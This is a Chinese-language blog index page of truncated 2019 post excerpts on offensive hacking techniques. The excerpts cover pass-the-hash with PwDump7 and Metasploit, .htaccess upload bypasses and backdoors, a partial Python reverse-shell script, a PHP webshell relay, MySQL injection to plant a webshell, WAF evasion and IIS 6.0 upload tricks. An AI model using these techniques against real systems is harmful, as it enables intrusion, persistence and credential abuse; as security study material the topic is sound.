上一页 1 ··· 4 5 6 7 8 9 10 11 12 ··· 18 下一页
摘要: 打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJH 阅读全文
posted @ 2019-07-06 21:00 紅人 阅读(1581) 评论(0) 推荐(0)
摘要: 有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录 我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统 1.利用抓哈希工具PwDump7.exe获取哈希 菜刀输入打开命令执行 PwDump7.exe>>1. 阅读全文
posted @ 2019-07-01 12:38 紅人 阅读(1267) 评论(0) 推荐(0)
摘要: 一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入 AddType application/x-httpd-php .png 打开另存为 保存类型为所有文件 上传.htaccess 必须是网站根路径 让png解析为php 2.留后门 可以在.htaccess 加入php解析规则 阅读全文
posted @ 2019-06-30 12:43 紅人 阅读(4790) 评论(0) 推荐(2)
摘要: 有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK 阅读全文
posted @ 2019-06-25 10:34 紅人 阅读(902) 评论(0) 推荐(0)
摘要: #服务端from socket import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',6666))#补丁端口 s.listen(1)#开始监听一个队列 sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号 print ('成功',addr)sock.send(str('dd').encode... 阅读全文
posted @ 2019-06-22 22:54 紅人 阅读(291) 评论(0) 推荐(0)
摘要: <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode(" 阅读全文
posted @ 2019-06-16 19:37 紅人 阅读(786) 评论(0) 推荐(0)
摘要: 如果一个平台有注入点的时候可以通过写一句话拿shell 条件 1.myql 5.6.34 版本区分 2.有写的权限 3.知道绝对路径 MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就 阅读全文
posted @ 2019-06-13 22:11 紅人 阅读(1569) 评论(0) 推荐(0)
摘要: 仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 先去安全狗网站下载最新的安全狗版本 从官网下载 windwos apache版 v4.0.2395 最新版 数据库是mysql 5.6 1.首先判断是否有注入点包括是字符型还是数字型注入 我们假设他是数字型注入 构造 id=0=0 在 阅读全文
posted @ 2019-06-06 15:02 紅人 阅读(4266) 评论(2) 推荐(3)
摘要: 仅供学习交流如果你有更好的思路可以一起分享,想一起学习的进我主页 首先WAF(Web Application Firewall),俗称Web应用防火墙,主要的目的实际上是用来过滤不正常或者恶意请求包,以及为服务器打上临时补丁的作用。 1、云waf: 在配置云waf时(通常是CDN包含的waf),DN 阅读全文
posted @ 2019-06-06 10:14 紅人 阅读(2355) 评论(0) 推荐(2)
摘要: 这个漏洞在南方cms 上出现的 主要是上传时候利用bp抓包 然后鼠标右键吧数据包发送到Repeater模块 找到你上传的包内容 一般是 61234564788Content-Disposition: form-data; name="FileName"; filename=“1.png” 图片内容 阅读全文
posted @ 2019-06-05 13:50 紅人 阅读(520) 评论(0) 推荐(0)
摘要: 目标系统 windows+php 1.字典爆破后台路径 2.后台弱口令爆破 3.进去后发现两个上传点 编辑器百度的 无版本漏洞 无法利用 有一个单独的备份模板上传 4.初次上传php后缀 被告知格式不允许 尝试其他后缀 .php5 .php1 之类的 都被禁止 1.png 可以 图片可以 图片名字被 阅读全文
posted @ 2019-06-05 13:11 紅人 阅读(874) 评论(0) 推荐(0)
摘要: 利用条件: 1.iis版本为6.0 2.上传文件名不会重命名 利用: 上传一个jpg木马图片 名字为:cs.asp:.jpg 注意是: 默认windows是不允许文件字含:(冒号)的 所以需要抓包后改下!! 上传成功后,iis会忽略掉:后面的字符,也就是成了cs.asp .但是在接收判断文件后缀还是 阅读全文
posted @ 2019-06-04 22:11 紅人 阅读(726) 评论(0) 推荐(0)
摘要: 这里要用到 可以在角色里面安装 终端服务配置 双击 选择环境 管理员进行3389登录时 执行1.bat 文件 也可以是一个恶意的exe bat 里面写 @echo offdate /t>>log.txt 获取日期time /t >>log.txt 获取时间netstat -n -p tcp |fin 阅读全文
posted @ 2019-06-04 19:30 紅人 阅读(447) 评论(0) 推荐(0)
摘要: 当对方设置最大连接数 超过限制时 可以用这个命令 win+r 输入 mstsc /v:192.168.18.131:3389 /console windows server 2003 sp2 以下的版本(包括) mstsc /v:192.168.18.131:3389 /admin windows 阅读全文
posted @ 2019-06-04 15:59 紅人 阅读(575) 评论(0) 推荐(0)
摘要: 阅读全文
posted @ 2019-06-04 10:40 紅人 阅读(343) 评论(0) 推荐(0)
摘要: 打开cmd 执行 quser 可以看到我有两个 会话 带> 是我当前的会话 rdp 是远程连接的会话 console 是本机操作 可以知道谁在连接你 状态是 唱片 就是未连接的意思 证明有过两个会话连接 阅读全文
posted @ 2019-06-03 14:52 紅人 阅读(2712) 评论(0) 推荐(0)
摘要: 执行net view 回显的错误 打开cmd执行两条命令 net start Browsernet stop mpssvc 在执行net view 还是提示6118 退出重新打开cmd 再执行 net view 就可以了 还不行多输入几遍命令 可能有缓存情况 记得刷新服务列表 可以写成bat 处理 阅读全文
posted @ 2019-06-03 12:06 紅人 阅读(2031) 评论(0) 推荐(0)
摘要: 利用ren 文件名替换命令 for循环去批处理 另存temp.bat 放到你要批量改名的文件家下 第一行 代表后面的命令只执行不显示命令 第二行 for 循环 %%m 批处理的自定义变量名 in(*) *代表当前文件任意文件 可以写成 *.doc 寻找后缀为doc 全部改成bat 后缀 第三行 不该 阅读全文
posted @ 2019-06-03 09:39 紅人 阅读(1281) 评论(0) 推荐(0)
摘要: win+r 打开cmd 输入 copy con 1.bat 回车 进入编辑状态输入 @echo off echo xxxx Ctrl+z 结束编辑 会在当前目录生成一个bat文件 阅读全文
posted @ 2019-06-02 16:54 紅人 阅读(504) 评论(0) 推荐(0)
摘要: 另存为bat 脚本 阅读全文
posted @ 2019-06-02 16:26 紅人 阅读(712) 评论(0) 推荐(0)
上一页 1 ··· 4 5 6 7 8 9 10 11 12 ··· 18 下一页